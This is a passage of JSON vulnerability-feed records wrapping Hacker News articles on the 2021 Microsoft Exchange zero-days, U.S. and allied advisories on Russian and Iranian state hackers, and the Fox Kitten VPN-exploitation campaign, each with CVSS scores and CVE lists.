[here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-AxSsNt-9gYo/YD838gSOOTI/AAAAAAAAB7Q/IuSgG26w0NU-eyKMabZMnUfb7QBDyHkUgCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nMicrosoft has [released emergency patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity and Dubex are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to 